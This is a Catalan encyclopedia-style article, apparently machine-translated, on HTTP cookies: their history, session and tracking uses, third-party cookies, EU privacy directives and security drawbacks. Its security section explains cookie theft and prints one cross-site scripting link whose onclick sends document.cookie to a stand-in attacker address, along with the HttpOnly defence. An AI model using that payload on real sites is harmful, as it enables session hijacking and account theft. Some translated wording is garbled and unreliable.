in definicions, wiki

Cookie d'Internet: què és? Definició, orígens, tipus i privadesa

Quina és la funció d'una galeta, què és i quins són els tipus de cookies? 🍪

56.3k vistes 384 Vots

Cookie d'Internet: què és? Definició, orígens, tipus i privadesa
Cookie d'Internet: què és? Definició, orígens, tipus i privadesa

Un galeta o galeta web (O galeta, abreujat com testimoni al Quebec) es defineix pel protocol de comunicació HTTP com una seqüència d'informació enviada per un servidor HTTP a un client HTTP, que aquest últim retorna cada vegada que es consulta el mateix servidor HTTP sota determinades condicions.

La galeta és l'equivalent a a petit fitxer de text emmagatzemat al terminal de l'usuari d'Internet. Amb més de 20 anys d'existència, permeten als desenvolupadors de llocs web emmagatzemar les dades dels usuaris per tal de facilitar-ne la navegació i permetre determinades funcionalitats. Les cookies sempre han estat més o menys controvertides perquè contenen informació personal residual que pot ser explotada per tercers.

El servidor web l'envia com a capçalera HTTP al navegador web que el retorna sense canvis cada vegada que accedeix al servidor. Es pot utilitzar una galeta una autenticació, una sessió (manteniment de l'estat), i per emmagatzemar informació específica sobre l'usuari, com ara les preferències del lloc o el contingut d'un carretó de la compra electrònica. El terme galeta es deriva de galeta màgica, un concepte molt conegut en informàtica UNIX, que va inspirar la idea i el nom de les galetes del navegador. Existeixen algunes alternatives a les cookies, cadascuna amb els seus usos, avantatges i inconvenients.

En ser fitxers de text simples, les galetes no són executables. No són ni programari espia ni virus, tot i que molts programaris antivirus detecten les galetes d'alguns llocs perquè permeten fer un seguiment dels usuaris quan visiten diversos llocs. 

La majoria dels navegadors moderns permeten als usuaris decidir si accepta o rebutja les cookies. Els usuaris també poden triar quant de temps s'emmagatzemen les galetes. No obstant això, el rebuig total de les cookies fa que alguns llocs no siguin utilitzables. Per exemple, emmagatzemeu carretons de la compra o llocs que requereixin iniciar sessió mitjançant credencials (nom d'usuari i contrasenya).

Índex de continguts

Històric

el terme galeta deriva del terme anglès galeta màgica, que és un paquet de dades que un programa rep i retorna sense canvis. Les galetes ja s'utilitzaven a TI quan Lou Montulli va tenir la idea d'utilitzar-los en comunicacions web al juny del 1994. En aquell moment, treballava per Netscape Communications, que havia desenvolupat una aplicació de comerç electrònic per a un client. Les galetes van donar una solució al problema de la fiabilitat de la implementació del carretó de la compra virtual d'una botiga.

John Giannandrea i Lou Montulli van escriure la primera especificació de galetes de Netscape aquell mateix any. Versió 0.9 beta de Mosaic Netscape, llançada el 13 d'octubre de 1994, integrada tecnologia de galetes (veure publicació). El primer ús (no experimental) de galetes va ser per determinar si els visitants del lloc web de Netscape havien visitat el lloc abans. Montulli va presentar una sol·licitud de patent per a la tecnologia de galetes el 1995 i es va concedir la patent dels EUA 5774670. concedit l'any 1998.

Després de ser implementades a Netscape 0.9 beta l'any 1994, les galetes es van integrar a Internet Explorer 2, llançat l'octubre de 1995.

La introducció de cookies encara no ha estat àmpliament coneguda pel públic. En particular, les galetes s'acceptaven per defecte a la configuració del navegador, i no s'informava als usuaris de la seva presència. Algunes persones eren conscients de l'existència de galetes al voltant del primer trimestre de 1995, però el públic en general només va acceptar la seva existència després que el Financial Times publicés un article el 12 de febrer de 1996. El mateix any, les galetes van rebre molta atenció mediàtica. a causa de possibles intrusions a la privadesa. El tema de les galetes es va tractar en dues consultes de la Comissió Federal de Comerç dels Estats Units el 1996 i el 1997.

El desenvolupament de l'especificació oficial de galetes ja estava en marxa. Les primeres discussions sobre l'especificació oficial van tenir lloc l'abril de 1995 a la llista de correu www-talk. Es va formar un grup de treball especial de l'IETF. Brian Behlendorf i David Kristol van proposar dues propostes alternatives per introduir transaccions d'estat a HTTP, respectivament, però el grup, liderat pel mateix Kristol, va decidir utilitzar l'especificació de Netscape com a punt de partida. El febrer de 1996, el grup de treball va determinar que les galetes de tercers eren una amenaça important per a la privadesa. L'especificació produïda pel grup es va publicar finalment com a RFC 2109.

Des de finals de 2014, veiem un bàner sobre galetes a molts llocs. Hi ha almenys una extensió del navegador que permet el bàner no es mostra.

Tipus de Cookies i Usos

Gestió de sessions

Les galetes es poden utilitzar per mantenir les dades de l'usuari durant la navegació, però també durant diverses visites. Les galetes es van introduir per oferir un mitjà per implementar els carretons electrònics de la compra, un dispositiu virtual en el qual l'usuari pot acumular els articles que vol comprar mentre navega pel lloc.

Actualment, les aplicacions com els carretons de la compra emmagatzemen la llista d'articles en una base de dades en un servidor, cosa que és preferible; que desar-los a la galeta mateixa. El servidor web envia una galeta que conté un identificador de sessió únic. Aleshores, el navegador web retorna aquest identificador de sessió a cada sol·licitud posterior i els articles de la cistella es guarden i s'associen amb aquest mateix identificador de sessió únic.

L'ús freqüent de galetes és útil per iniciar sessió en un lloc mitjançant credencials. En resum, el servidor web envia primer una galeta que conté un identificador de sessió únic. A continuació, els usuaris proporcionen les seves credencials (normalment un nom d'usuari i una contrasenya). Aleshores, l'aplicació web autentica la sessió i permet a l'usuari accedir al servei.

personalització

Les cookies es poden utilitzar per recordar informació sobre l'usuari d'un lloc, amb la finalitat de mostrar-li el contingut adequat en el futur. Per exemple, un servidor web pot enviar una galeta que contingui l'últim nom d'usuari utilitzat per iniciar la sessió a aquest lloc web, de manera que aquest nom d'usuari es pugui emplenar prèviament en futures visites.

Molts llocs web utilitzen cookies per a la personalització en funció de les preferències de l'usuari. Els usuaris seleccionen les seves preferències en un formulari i les envien al servidor. El servidor codifica les preferències en una galeta i les torna al navegador. Posteriorment, cada vegada que l'usuari accedeix a una pàgina d'aquest lloc, el navegador retorna la cookie i per tant la llista de preferències; el servidor pot personalitzar la pàgina segons les preferències de l'usuari. Per exemple, el lloc web de la Viquipèdia permet als seus usuaris triar la pell del lloc que prefereixen. El cercador de Google permet als seus usuaris (encara que no estiguin registrats) triar el nombre de resultats que volen veure a cada pàgina de resultats.

Pistatge

Les galetes de seguiment s'utilitzen per fer un seguiment dels hàbits de navegació dels usuaris d'Internet. Això també es pot fer en part utilitzant l'adreça IP de l'ordinador que fa una sol·licitud per a una pàgina o utilitzant la capçalera HTTP "referent" que el client envia amb cada sol·licitud, però les galetes permeten una major precisió. Això es pot fer com en l'exemple següent:

  1. Si l'usuari accedeix a una pàgina d'un lloc i la sol·licitud no conté cap cookie, el servidor assumeix que aquesta és la primera pàgina que visita l'usuari. Aleshores, el servidor crea una cadena aleatòria i l'envia al navegador juntament amb la pàgina sol·licitada.
  2. A partir d'aquest moment, la galeta serà enviada automàticament pel navegador cada vegada que es crida a una pàgina nova del lloc. El servidor enviarà la pàgina com és habitual, però també registrarà l'URL de la pàgina anomenada, la data, l'hora de la sol·licitud i la galeta en un fitxer de registre.

En mirar el fitxer de registre, és possible veure quines pàgines ha visitat l'usuari i en quin ordre. Per exemple, si el fitxer conté unes quantes peticions fetes amb la galeta id=abc, això pot establir que totes aquestes peticions provenen del mateix usuari. L'URL sol·licitat, la data i l'hora associades a les sol·licituds permeten fer un seguiment de la navegació de l'usuari.

Les galetes i balises web de tercers, que s'expliquen a continuació, també permeten el seguiment en diferents llocs. El seguiment d'un sol lloc s'utilitza generalment amb finalitats estadístiques. En canvi, el seguiment a través de diferents llocs que utilitzen galetes de tercers l'utilitzen generalment les empreses publicitàries per produir perfils d'usuari anònims (que després s'utilitzen per determinar quins anuncis s'han de mostrar a l'usuari, així com per enviar-li correus electrònics corresponents a aquests anuncis: SPAM). ).

Les galetes de seguiment són un risc d'invasió de la privadesa de l'usuari, però es poden eliminar fàcilment. La majoria dels navegadors moderns inclouen una opció per eliminar automàticament les galetes persistents en tancar l'aplicació.

Cookies de tercers

Les imatges i altres objectes continguts en una pàgina web poden residir en servidors diferents del que allotja la pàgina. Per mostrar la pàgina, el navegador baixa tots aquests objectes. La majoria de llocs web contenen informació de diferents fonts. Per exemple, si escriviu www.example.com al vostre navegador, sovint hi haurà objectes o anuncis a part de la pàgina que provenen de fonts diferents, és a dir, d'un domini diferent de www. .example.com. Les galetes "primeres" són galetes configurades pel domini que apareix a la barra d'adreces del navegador. Les galetes de tercers les estableix un dels objectes de la pàgina que prové d'un domini diferent.

De manera predeterminada, navegadors com Mozilla Firefox, Microsoft Internet Explorer i Opera accepten galetes de tercers, però els usuaris poden canviar la configuració de les opcions del navegador per bloquejar-les. No hi ha cap risc de seguretat inherent a les galetes de tercers que permeten la funcionalitat web, però també s'utilitzen per fer un seguiment dels usuaris. de lloc a lloc.

Eines com Ghostery disponibles per a tots els navegadors, inclòs Google Chrome, poden bloquejar els intercanvis entre tercers.

Implementació

Una possible interacció entre un navegador web i el servidor que allotja la pàgina web. El servidor envia una galeta al navegador i el navegador la torna quan crida a una altra pàgina.
Una possible interacció entre un navegador web i el servidor que allotja la pàgina web. El servidor envia una galeta al navegador i el navegador la torna quan crida a una altra pàgina.

Les cookies són petites dades que el servidor web envia al navegador. El navegador els torna sense canvis al servidor, introduint l'estat (memòria d'esdeveniments passats) a la transacció HTTP sense estat. Sense cookies, cada recuperació d'una pàgina web o d'un component d'una pàgina web és un esdeveniment aïllat, independentment d'altres sol·licituds realitzades al mateix lloc. A més de poder ser configurades pel servidor web, les galetes també es poden establir mitjançant llenguatges de script com JavaScript, si el navegador ho admet i ho autoritza.

L'especificació oficial de galetes suggereix que els navegadors haurien de poder desar i tornar a enviar un nombre mínim de galetes. Concretament, un navegador hauria de ser capaç d'emmagatzemar almenys 300 galetes de quatre kilobytes cadascuna, i almenys 20 galetes per a un únic servidor o domini.

D'acord amb l'apartat 3.1 de RFC 2965, els noms de les galetes no distingeixen entre majúscules i minúscules.

Una galeta pot especificar la data de caducitat, en aquest cas la galeta s'eliminarà en aquesta data. Si la galeta no especifica una data de caducitat, la galeta s'elimina tan bon punt l'usuari abandona el seu navegador. Per tant, especificar una data de caducitat és una manera de fer que la galeta sobrevisqui durant diverses sessions. Per aquest motiu, es diu que les galetes amb data de caducitat són persistent. Un exemple d'aplicació: un lloc de venda al detall pot utilitzar galetes persistents per registrar els articles que els usuaris han col·locat al seu carretó de la compra (en realitat, la galeta pot fer referència a una entrada desada en una base de dades del lloc de venda, i no al vostre ordinador) . Mitjançant aquest mitjà, si els usuaris abandonen el seu navegador sense fer cap compra i hi tornen més tard, podran tornar a trobar els articles al carretó. Si aquestes cookies no donaven data de caducitat, caducarien quan es tanqués el navegador i es perdria la informació sobre el contingut de la cistella.

L'abast de les galetes es pot limitar a un domini, subdomini o camí específic del servidor que les va crear.

La transferència de pàgines web es fa mitjançant el protocol de transferència d'hipertext (HTTP). En ignorar les galetes, els navegadors criden a una pàgina des dels servidors web generalment els envien un text breu anomenat Sol·licitud HTTP. Per exemple, per accedir a la pàgina www.example.org/index.html, els navegadors es connecten al servidor www.example.org i envien una sol·licitud com aquesta:

GET /index.html HTTP/1.1Host: www.example.org
navegantservidor

El servidor respon enviant la pàgina sol·licitada, precedida d'un text semblant, s'anomena el conjunt Resposta HTTP. Aquest paquet pot contenir línies que indiquen al navegador que emmagatzemi cookies:

HTTP/1.1 200 OKTipus de contingut: text/htmlSet-Cookie: nom=valor
(pàgina HTML)
navegantservidor

El servidor només envia la línia Set-Cookie, si el servidor vol que el navegador emmagatzemi una galeta. Set-Cookie és una sol·licitud perquè el navegador emmagatzemi la cadena de nom=valor i la retorni en totes les sol·licituds futures al servidor. Si el navegador admet cookies i les cookies estan habilitades a les opcions del navegador, la galeta s'inclourà en totes les sol·licituds posteriors realitzades al mateix servidor. Per exemple, el navegador crida a la pàgina www.example.org/news.html enviant la següent sol·licitud al servidor www.example.org:

GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
navegantservidor

Es tracta d'una sol·licitud per a una altra pàgina del mateix servidor, i difereix de la primera anterior perquè conté una cadena que el servidor va enviar prèviament al navegador. Gràcies a aquest mitjà, el servidor sap que aquesta sol·licitud està vinculada a l'anterior. El servidor respon enviant la pàgina trucada, i també afegint-hi altres cookies.

El servidor pot canviar el valor de la galeta enviant una nova línia Set-Cookie: name=new_value en resposta a la pàgina trucada. Aleshores, el navegador substitueix el valor antic pel nou.

La línia Set-Cookie la crea normalment un programa CGI o un altre llenguatge de script, no el servidor HTTP. El servidor HTTP (exemple: Apache) només transmetrà el resultat del programa (un document precedit de la capçalera que conté les cookies) al navegador.

Les galetes també es poden establir mitjançant JavaScript o altres idiomes similars que s'executen al navegador, és a dir, al costat del client en lloc del costat del servidor. A JavaScript, l'objecte document.cookie s'utilitza amb aquesta finalitat. Per exemple, la declaració document.cookie = "temperatura=20" crea una galeta anomenada "temperatura" i amb un valor de 20.

Exemple d'una resposta HTTP de google.com, que estableix una galeta amb atributs.
Exemple d'una resposta HTTP de google.com, que estableix una galeta amb atributs.

A més del parell nom/valor, una galeta també pot contenir una data de caducitat, un camí, un nom de domini i el tipus de connexió previst, és a dir, normal o xifrada. La RFC 2965 també defineix que les galetes han de tenir un número de versió obligatori, però generalment s'omet. Aquestes parts de dades segueixen el parell nom=nou_valor i estan separades per punt i coma. Per exemple, el servidor pot crear una galeta enviant una línia Set-Cookie: nom=nou_valor; caduca=data; camí=/; domini=.example.org.

Les cookies caduquen i després el navegador no envia al servidor en les situacions següents:

  • Quan es tanca el navegador, si la galeta no és persistent.
  • Quan hagi passat la data de caducitat de la galeta.
  • Quan es canvia la data de caducitat de la galeta (pel servidor o l'script) a una data del passat.
  • Quan el navegador elimina la cookie a petició de l'usuari.

La tercera situació permet als servidors o scripts eliminar explícitament una galeta. Tingueu en compte que amb el navegador web Google Chrome és possible conèixer la data de caducitat d'una determinada galeta accedint a la configuració del contingut. Una galeta desada en un ordinador pot quedar-hi durant diverses dècades si no es fa cap procediment per esborrar-la.

Estereotips

Des de la seva introducció a Internet, moltes idees sobre les galetes han circulat per Internet i pels mitjans de comunicació. L'any 1998, CIAC, un equip de monitoratge d'incidents informàtics del Departament d'Energia dels Estats Units, va determinar que les vulnerabilitats de seguretat de les galetes eren "essencialment inexistents" i va explicar que "la informació sobre l'origen de les vostres visites i els detalls de les pàgines web que heu visitat ja existeixen als fitxers de registre dels servidors web”. L'any 2005, Jupiter Research va publicar els resultats d'un estudi, en el qual un percentatge important dels enquestats considerava les afirmacions següents:

  • Les galetes són com virus, infecten els discs durs dels usuaris.
  • Es generen cookies automàtic.
  • Les cookies s'utilitzen per enviar spam.
  • Les cookies s'utilitzen només per a publicitat.

Les cookies no poden esborrar ni llegir informació de l'ordinador de l'usuari. No obstant això, les cookies permeten detectar les pàgines web visitades per un usuari en un lloc determinat o conjunt de llocs. Aquesta informació es pot recopilar en un perfil d'usuari que es pot utilitzar o revendre a tercers, cosa que pot suposar greus problemes de privadesa. Alguns perfils són anònims, en el sentit que no contenen informació personal, però fins i tot aquests perfils poden ser qüestionables.

Segons el mateix estudi, un gran percentatge d'usuaris d'Internet no saben com eliminar les cookies. Una de les raons per les quals la gent no confia en les galetes és que alguns llocs han abusat de l'aspecte d'identificació personal de les galetes i han compartit aquesta informació amb altres fonts. Un gran percentatge de la publicitat dirigida i el correu electrònic no sol·licitat, considerat correu brossa, prové de la informació obtinguda de les galetes de seguiment.

Configuració del navegador

La majoria dels navegadors admeten cookies i permeten a l'usuari desactivar-les. Les opcions més habituals són:

  • Habiliteu o desactiveu les galetes completament, de manera que siguin acceptades o bloquejades constantment.
  • Permetre a l'usuari veure les cookies actives en una pàgina determinada, introduint javascript: alert(document.cookie) a la barra d'adreces del navegador. Alguns navegadors incorporen un gestor de galetes per a l'usuari que pot visualitzar i eliminar selectivament les galetes emmagatzemades actualment pel navegador.

La majoria dels navegadors també permeten l'eliminació total de dades personals que inclouen galetes. També existeixen mòduls addicionals per controlar els permisos de galetes.

Privadesa i cookies de tercers

En aquest exemple fictici, una empresa de publicitat ha col·locat banners en dos llocs web. Amb l'allotjament dels banners als seus servidors i l'ús de cookies de tercers, l'empresa publicitària és capaç de fer un seguiment de la navegació de l'usuari per aquests dos llocs.

Les galetes tenen implicacions importants per a la privadesa i l'anonimat dels usuaris de la web. Tot i que les cookies només s'envien al servidor que les ha configurat o a un servidor pertanyent al mateix domini d'Internet, una pàgina web pot contenir imatges o altres components emmagatzemats en servidors pertanyents a altres dominis. S'anomenen les cookies que s'estableixen durant la recuperació d'aquests components externs cookies de tercers. Això inclou les galetes de finestres emergents no desitjades.

Les empreses de publicitat utilitzen cookies de tercers per fer un seguiment dels usuaris als diferents llocs que visiten. En particular, una empresa de publicitat pot fer un seguiment d'un usuari a totes les pàgines on ha col·locat imatges publicitàries o un píxel de seguiment. El coneixement de les pàgines visitades per l'usuari permet a l'empresa publicitària orientar-se a les preferències publicitàries de l'usuari.

La capacitat de crear un perfil d'usuari és considerada per alguns com una invasió de privadesa, especialment quan el seguiment es fa en diferents dominis mitjançant galetes de tercers. Per aquest motiu, alguns països tenen legislació sobre galetes.

El govern dels Estats Units va implementar regles estrictes sobre la col·locació de galetes l'any 2000, després que es revelés que l'Oficina de Política de Medicaments de la Casa Blanca utilitzava galetes per rastrejar els ordinadors dels usuaris que veien anuncis de drogues en línia. El 2002, l'activista de privadesa Daniel Brandt va descobrir que la CIA deixava galetes persistents als ordinadors que havien visitat els seus llocs web. Un cop informada d'aquest incompliment, la CIA va declarar que aquestes cookies no s'havien enviat intencionadament i va deixar de configurar-les. El 25 de desembre de 2005, Brandt va descobrir que l'Agència de Seguretat Nacional (NSA) havia deixat dues galetes persistents als ordinadors dels visitants a causa d'una actualització de programari. Després de rebre la notificació, l'NSA va desactivar immediatament les galetes.

Al Regne Unit, el Llei de cookies “, entrat en vigor el 25 de maig de 2012, obliga els llocs a declarar les seves intencions, permetent així als usuaris escollir si volen deixar rastres o no del seu pas a Internet. Així, es poden protegir de l'orientació publicitària. Malgrat això, d'acord amb The Guardian, el consentiment dels usuaris d'Internet no és necessàriament explícit; s'han fet canvis en les condicions del consentiment de l'usuari, fent-ho així implicat.

Directiva 2002/58 sobre privadesa

La Directiva 202/58 de privacitat i comunicacions electròniques, conté normes sobre l'ús de cookies. En particular, l'article 5, apartat 3 d'aquesta directiva exigeix ​​que l'emmagatzematge de dades (com ara cookies) a l'ordinador de l'usuari només es pugui fer si:

  • s'informa a l'usuari de com s'utilitzen les dades;
  • l'usuari té l'opció de rebutjar aquesta operació d'emmagatzematge. Tanmateix, aquest article també estableix que l'emmagatzematge de dades per motius tècnics està exempt d'aquesta llei.

No obstant això, que s'havia d'aplicar a partir de l'octubre de 2003, la directiva només es va posar en pràctica de manera molt imperfecta segons un informe de desembre de 2004, que també assenyalava que alguns estats membres (Eslovàquia, Letònia, Grècia, Bèlgica i Luxemburg) encara no havien transposat la normativa. directiva al dret intern.

Segons l'opinió del G29 l'any 2010, aquesta directiva, que condiciona especialment l'ús de cookies amb finalitats de publicitat comportamental, sobre el consentiment explícit de l'usuari d'Internet segueix molt mal aplicada. De fet, la majoria de llocs ho fan d'una manera que no s'ajusta a la directiva, limitant-se a un simple "banner" informant de l'ús de "cookies" sense donar informació sobre els usos, sense diferenciar entre cookies "tècniques". cookies de "seguiment", ni oferir una opció real a l'usuari que desitgi mantenir les cookies tècniques (com ara les de gestió del carro de la compra) i rebutjar les cookies de "seguiment". De fet, molts llocs no funcionen correctament si es rebutgen les cookies, la qual cosa no compleix la directiva 2002/58 o la directiva 95/46 (Protecció de dades personals).

Directiva 2009/136 / CE

Aquest material ha estat actualitzat per la Directiva 2009/136/CE de 25 de novembre de 2009 que estableix que "l'emmagatzematge d'informació, o l'obtenció d'accés a la informació ja emmagatzemada, en l'equip terminal d'un abonat o usuari només està permès a condició que el El subscriptor o usuari ha donat el seu consentiment, després d'haver rebut, en compliment de la Directiva 95/46/CE, informació clara i completa, entre altres, sobre les finalitats del tractament”. Per tant, la nova directiva reforça les obligacions prèvies a la col·locació de cookies a l'ordinador de l'usuari d'Internet.

En les consideracions prèvies de la directiva, el legislador europeu especifica, però: "Quan sigui tècnicament possible i efectiu, d'acord amb les disposicions pertinents de la Directiva 95/46/CE, el consentiment de l'usuari pel que fa al tractament es pot expressar a través de la ús de la configuració adequada d'un navegador o d'una altra aplicació”. Però, de fet, cap navegador fins ara no permet dissociar les cookies tècniques essencials de les opcionals que s'haurien de deixar a l'elecció de l'usuari.

Aquesta nova directiva va ser transposada pels diputats belgues el juliol de 2012. Un estudi de 2014 mostra que fins i tot els diputats tenen problemes per aplicar les limitacions de la directiva.

P3P

L'especificació P3P inclou la capacitat per a un servidor d'establir una política de privadesa, que defineix quin tipus d'informació recopila i amb quina finalitat. Aquestes polítiques inclouen (però no es limiten a) l'ús de la informació recollida mitjançant galetes. Segons les definicions de P3P, un navegador pot acceptar o rebutjar les cookies comparant les polítiques de privadesa amb les preferències de l'usuari o preguntant a l'usuari, presentant la política de privadesa declarada pel servidor.

Molts navegadors, inclosos Apple Safari i Microsoft Internet Explorer versions 6 i 7, admeten P3P, que permet al navegador determinar si accepta l'emmagatzematge de galetes de tercers. El navegador Opera permet als usuaris rebutjar les cookies de tercers i crear un perfil de seguretat global i específic per als dominis d'Internet. La versió 2 de Mozilla Firefox va deixar el suport P3P, però la va restablir a la versió 3.

La majoria de navegadors poden bloquejar les galetes de tercers per augmentar la privadesa i reduir el seguiment dels anuncis, sense afectar negativament l'experiència web de l'usuari. Moltes agències de publicitat ofereixen una opció desactivar a la publicitat dirigida, mitjançant la configuració d'una galeta genèrica al navegador que desactiva aquesta orientació, però aquesta solució no és pràcticament efectiva, quan es respecta, perquè aquesta galeta genèrica s'esborra tan bon punt l'usuari elimina aquestes cookies que anul·la l'opció. fora decisió.

Inconvenients de les cookies

A més dels problemes de privadesa, les galetes també tenen alguns inconvenients tècnics. En particular, no sempre identifiquen amb precisió els usuaris, poden alentir el rendiment del lloc quan són grans, es poden utilitzar per a atacs de seguretat i entren en conflicte amb la transferència estatal representativa, l'estil arquitectònic del programari.

Identificació imprecisa

Si s'utilitza més d'un navegador en un ordinador, en cadascun d'ells sempre hi ha una unitat d'emmagatzematge independent per a les galetes. Per tant, les cookies no identifiquen una persona, sinó la combinació d'un compte d'usuari, un ordinador i un navegador web. Així, qualsevol pot utilitzar aquests comptes, ordinadors o navegadors que tenen la panoplia de cookies. De la mateixa manera, les galetes no diferencien entre diversos usuaris que comparteixen el mateix compte d'usuari, ordinador i navegador, com ara els "cafès Internet" o qualsevol lloc que doni accés gratuït als recursos informàtics.

Però, a la pràctica, aquesta afirmació resulta en la majoria dels casos enganyosa perquè avui dia un ordinador "personal" (o un telèfon intel·ligent, o una tauleta, que és pitjor) és utilitzat principalment per un sol individu, això equival a dirigir-se a una persona concreta i A través del volum d'informació recopilada, s'arriba a una orientació personalitzada encara que la persona no estigui identificada.

Una galeta pot ser robada per un altre ordinador de la xarxa.

Durant el funcionament normal, les cookies es tornen a enviar entre el servidor (o un grup de servidors del mateix domini) i el navegador de l'ordinador de l'usuari. Atès que les cookies poden contenir informació sensible (nom d'usuari, contrasenya utilitzada per a l'autenticació, etc.), els seus valors no haurien de ser accessibles per a altres ordinadors. El robatori de galetes és un acte d'intercepció de galetes per part d'un tercer no autoritzat.

Les galetes es poden robar mitjançant un rastrejador de paquets en un atac anomenat segrest de sessió. El trànsit a la xarxa pot ser interceptat i llegit per ordinadors diferents dels que envien i reben (especialment a l'espai Wi-Fi públic no xifrat). Aquest trànsit inclou galetes enviades durant sessions mitjançant el protocol HTTP normal. Quan el trànsit de xarxa no està xifrat, els usuaris maliciosos poden llegir les comunicacions d'altres usuaris a la xarxa mitjançant "sniffers de paquets".

Aquest problema es pot solucionar xifrant la connexió entre l'ordinador de l'usuari i el servidor mitjançant el protocol HTTPS. Un servidor pot especificar a bandera segura mentre configura una galeta; el navegador només l'enviarà a través d'una línia segura, com ara una connexió SSL.

No obstant això, molts llocs, tot i que utilitzen la comunicació encriptada HTTPS per a l'autenticació de l'usuari (és a dir, la pàgina d'inici de sessió), posteriorment envien galetes de sessió i altres dades amb normalitat, mitjançant connexions HTTP no xifrades per raons d'eficiència. Així, els atacants poden interceptar les galetes d'altres usuaris i suplantar-les als llocs adequats o utilitzar-les en atacs de galetes.

Scripting al lloc: una cookie que només s'ha d'intercanviar entre el servidor i el client s'envia a un altre tercer.

Una altra manera de robar galetes és crear scripts de llocs i fer que el propi navegador enviï galetes a servidors maliciosos que mai les reben. Els navegadors moderns permeten l'execució de parts de codi buscades des del servidor. Si s'accedeix a les galetes durant el temps d'execució, els seus valors es poden comunicar d'alguna forma als servidors que no hi haurien d'accedir. Xifrar les galetes abans que s'enviïn a la xarxa no ajuda a frustrar l'atac.

Els atacants solen utilitzar aquest tipus de seqüències d'ordres al lloc en llocs que permeten als usuaris publicar contingut HTML. En integrar una part de codi compatible a la contribució HTML, un atacant pot rebre galetes d'altres usuaris. El coneixement d'aquestes galetes es pot utilitzar connectant-se al mateix lloc utilitzant les galetes robades, sent reconegut així com l'usuari les galetes del qual van ser robades.

Una manera d'evitar aquests atacs és utilitzar el senyalador HttpOnly; es tracta d'una opció, introduïda des de la versió 6 d'Internet Explorer en PHP des de la versió 5.2.0 que està pensada perquè la galeta sigui inaccessible al client propera a l'script. Tanmateix, els desenvolupadors web haurien de tenir-ho en compte en el desenvolupament del seu lloc perquè siguin immunes als scripts al lloc.

Una altra amenaça de seguretat utilitzada és la fabricació de demanda al lloc.

L'especificació tècnica oficial permet que les cookies es tornin només als servidors del domini del qual s'originaren. No obstant això, el valor de les galetes es pot enviar a altres servidors mitjançant mitjans diferents de les capçaleres de galetes.

En particular, els llenguatges de script com JavaScript poden accedir generalment als valors de les galetes i són capaços d'enviar valors arbitraris a qualsevol servidor d'Internet. Aquesta capacitat d'escriptura s'utilitza des de llocs web que permeten als usuaris publicar contingut HTML perquè altres usuaris el vegin.

Per exemple, un atacant que opera al domini example.com pot publicar un comentari que contingui l'enllaç següent que indiqui un bloc popular que d'altra manera no controla:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Quan un altre usuari fa clic en aquest enllaç, el navegador executa la part de l'atribut onclick del codi, de manera que substitueix la cadena document.cookie per la llista de galetes d'usuari que estan actives per a aquesta pàgina. Per tant, aquesta llista de galetes s'envia al servidor example.com i, per tant, l'atacant pot recollir les galetes d'aquest usuari.

Aquest tipus d'atac és difícil de detectar per part de l'usuari perquè l'script prové del mateix domini que ha establert la cookie, i l'operació d'enviament dels valors sembla autoritzada per aquest domini. Es considera que és responsabilitat dels administradors que operen aquest tipus de llocs posar en marxa restriccions que impedeixin la publicació de codi maliciós.

Les galetes no són directament visibles per als programes del costat del client com JavaScript si s'envien amb la marca HttpOnly. Des del punt de vista del servidor, l'única diferència és que a la línia de la capçalera Set-Cookie s'afegeix un camp nou que conté la cadena HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Quan el navegador rep una galeta d'aquest tipus, se suposa que l'utilitzarà normalment en el següent intercanvi HTTP, però sense fer-la visible per als scripts executats al costat del client. La marca HttpOnly no forma part de cap especificació tècnica oficial i no està implementada en tots els navegadors. Tingueu en compte que actualment no hi ha manera d'impedir la lectura i escriptura de les galetes de sessió mitjançant el mètode XMLHTTPRequest.

Modificació del contingut: un atacant envia una galeta no vàlida a un servidor, possiblement feta a partir d'una galeta vàlida enviada pel servidor.

Tan aviat com les galetes s'han d'emmagatzemar i retornar sense canvis al servidor, un atacant pot modificar el valor de les galetes abans de tornar-les a enviar al servidor. Per exemple, si una galeta conté el valor total que l'usuari ha de pagar pels articles col·locats al carretó de la compra de la botiga, canviar aquest valor exposa el servidor al risc de cobrar a l'atacant menys que el preu inicial. S'anomena el procés de modificació del valor de les cookies intoxicació per galetes i es pot utilitzar després del robatori de galetes per fer que l'atac sigui persistent.

En el mètode d'anul·lació de galetes, l'atacant aprofita una fallada del navegador per enviar una galeta no vàlida al servidor.

Tanmateix, la majoria de llocs web només emmagatzemen un identificador de sessió (un número únic generat aleatòriament que s'utilitza per identificar l'usuari de la sessió) a la galeta, mentre que tota la resta d'informació s'emmagatzema al servidor. En aquest cas, aquest problema es resol en gran mesura.

S'espera que cada lloc tingui les seves pròpies galetes, de manera que un lloc no hauria de poder modificar o crear galetes associades a un altre lloc. Una fallada de seguretat del navegador web pot permetre que els llocs maliciosos incompleixin aquesta regla. L'explotació d'aquest defecte s'anomena habitualment cuina entre llocs. El propòsit d'aquests atacs pot ser el robatori d'identificació de sessió.

Els usuaris haurien d'utilitzar les últimes versions dels navegadors web en què aquestes vulnerabilitats s'eliminin pràcticament.

Estat conflictiu entre client i servidor

L'ús de cookies pot generar una contradicció entre l'estat del client i l'estat emmagatzemat a la cookie. Si l'usuari adquireix una cookie i fa clic al botó "Enrere" del navegador, l'estat del navegador no és generalment el mateix que abans d'aquesta adquisició. Per exemple, si la cistella d'una botiga en línia es crea mitjançant galetes, el contingut de la cistella no pot canviar quan l'usuari torna a l'historial del navegador: si l'usuari prem un botó per afegir un article a la seva cistella i fa clic a "Tornar". ", l'article roman en aquest. Aquesta no pot ser la intenció de l'usuari, que sens dubte vol cancel·lar l'addició de l'article. Això pot conduir a manca de fiabilitat, confusió i errors. Per tant, els desenvolupadors web haurien de ser conscients d'aquest problema i implementar mesures per gestionar situacions com aquesta.

Els experts en seguretat de privadesa han criticat les galetes persistents per no haver-se configurat per caducar prou aviat, la qual cosa permet als llocs web fer un seguiment dels usuaris i crear el seu perfil al llarg del temps. Aquest aspecte de les galetes també forma part del problema de segrest de sessió, perquè una galeta persistent robada es pot utilitzar per suplantar la identitat d'un usuari durant un període de temps considerable.

Llegir també: GAFAM: qui són? Per què (de vegades) fan tanta por?

Alternatives a les galetes

Algunes operacions que es poden realitzar mitjançant galetes també es poden realitzar mitjançant altres mecanismes que permeten prescindir de galetes o recrear galetes esborrades, la qual cosa crea problemes de privadesa de la mateixa manera (o de vegades pitjor perquè aleshores són invisibles) que les galetes.

Adreça IP

